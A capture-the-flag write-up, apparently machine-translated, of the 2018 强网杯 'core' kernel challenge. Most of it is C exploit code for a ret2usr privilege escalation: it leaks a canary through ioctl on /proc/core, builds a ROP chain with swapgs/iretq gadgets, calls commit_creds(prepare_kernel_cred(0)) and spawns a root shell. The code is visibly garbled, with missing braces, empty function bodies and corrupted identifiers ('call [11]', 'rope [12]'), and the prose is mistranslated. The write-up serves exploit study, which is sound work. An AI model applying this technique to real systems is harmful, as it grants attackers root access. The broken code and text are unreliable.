The ret2usr attack exploits the user space of the user space to access the kernel space, but the kernel space can access the user space** This feature directs the kernel code or data stream to the user control, and performs the userspace code completion with the ring 0
privilege. Wait for the operation.
2018 强网杯- core¶
The previous article analyzed the use of [kernel rop] ( to complete the lifting of the shell. Step, this analysis uses the ret2usr method to get the root shell.
The topic is no longer analyzed, directly analyzing exp.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pop user_rflags;"
puts("[*]status has been saved.");
void get_shell(void){
size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t vmlinux_base = 0;
size_t find_symbols()
FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");
/* FILE* kallsyms_fd = fopen("./test_kallsyms", "r"); */
if(kallsyms_fd < 0)
puts("[*]open kallsyms error!");
char buf[0x30] = {0};
while(fgets(buf, 0x30, kallsyms_fd))
if(commit_creds & prepare_kernel_cred)
return 0;
if(strstr(buf, "commit_creds") && !commit_creds)
/* puts(buf); */
char hex[20] = {0};
strncpy(hex, buf, 16);
/* printf("hex: %s\n", hex); */
sscanf(hex, "%llx", &commit_creds);
printf("commit_creds addr: %p\n", commit_creds);
vmlinux_base = commit_creds - 0x9c8e0;
printf("vmlinux_base addr: %p\n", vmlinux_base);
if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
/* puts(buf); */
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &prepare_kernel_cred);
printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
vmlinux_base = prepare_kernel_cred - 0x9cce0;
/* printf("vmlinux_base addr: %p\n", vmlinux_base); */
if(!(prepare_kernel_cred & commit_creds))
void get_root()
char * (* pkc) (int) = prepare_kernel_cred;
void (*cc)(char*) = commit_creds;
(* cc) ((* pkc) (0));
/* puts("[*] root now."); */
void set_off(int fd, long long idx)
printf("[*]set off to %ld\n", idx);
ioctl(fd, 0x6677889C, idx);
void core_read(int fd, char *buf)
puts("[*]read to buf.");
ioctl(fd, 0x6677889B, buf);
void core_copy_func(int fd, long long size)
printf("[*]copy from user with size: %ld\n", size);
ioctl(fd, 0x6677889A, size);
int main(void)
size_t offset = vmlinux_base - raw_vmlinux_base;
int fd = open("/proc/core",O_RDWR);
set_off(fd, 0x40);
size_t buf[0x40/8];
core_read(fd, buf);
size_t canary = buf[0];
printf("[*]canary : %p\n", canary);
size_t rop[0x30] = {0};
rop[8] = canary ;
rop[10] = (size_t)get_root;
call [11] = 0xffffffff81a012da + offset; // swapgs; popfq; right
rope [12] = 0;
call [13] = 0xffffffff81050ac2 + offset; // iretq; right;
rop[14] = (size_t)get_shell;
rop[15] = user_cs;
rop[16] = user_rflags;
rop[17] = user_sp;
rop[18] = user_ss;
puts("[*] DEBUG: ");
write(fd, rop, 0x30 * 8);
core_copy_func(fd, 0xffffffffffff0000 | (0x100));
Compare the similarities and differences between [kernel rop] (
- Get
by reading/tmp/kallsyms
, and determine the address of the gadget based on these offsets. - The method of leak canary is the same, and the canary is read by controlling the global variable
. - Unlike the kernel rop approach, the construction of the rop chain
- The kernel rop reaches the execution of
by the rop chain of the kernel space, and then returns to the user mode throughswapgs; iretq
, etc., and executes thesystem("/bin/ of the user space. Sh")
Get the shell - In the ret2usr approach, return directly to the user space constructor's
(implemented by function pointer) to raise the weight. Although these two functions are in kernel space, we arering 0
at this time. Privileges, so it works fine. Then also passswapgs; iretq
back to the user mode to execute the user spacesystem("/bin/sh")
A comparison of these two approaches can be seen as the reason for ret2usr
because it is generally much simpler to construct a specific purpose code in user space than in kernel space.
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